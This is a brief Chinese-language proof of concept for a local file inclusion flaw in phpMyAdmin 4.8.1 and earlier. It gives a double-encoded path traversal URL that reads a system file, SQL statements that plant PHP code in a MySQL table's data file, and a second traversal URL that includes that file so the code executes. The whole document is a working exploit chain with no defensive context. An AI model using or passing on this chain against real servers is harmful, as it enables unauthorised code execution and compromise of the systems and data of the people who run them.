前提
phpmyadmin版本 <= 4.8.1
POC
http://127.0.0.1/phpmyadmin_4_8_1/index.php?target=db_sql.php%253f/../../../../../../windows/win.ini
1.确定MySql位置
select @@basedir;
2.选择数据库,将shell内容写入到数据库文件中
Create TABLE study (cmd text NOT NULL);
Insert INTO study (cmd) VALUES('<?php phpinfo()?>');
写入的文件在:C:XXXXMySQLdata数据库名称study.MYD
文件
3.使用文件包含包含数据库文件
http://127.0.0.1/phpmyadmin_4_8_1/index.php?target=db_sql.php%253f/../../../../../../phpStudy/PHPTutorial/MySQL/data/test/study.MYD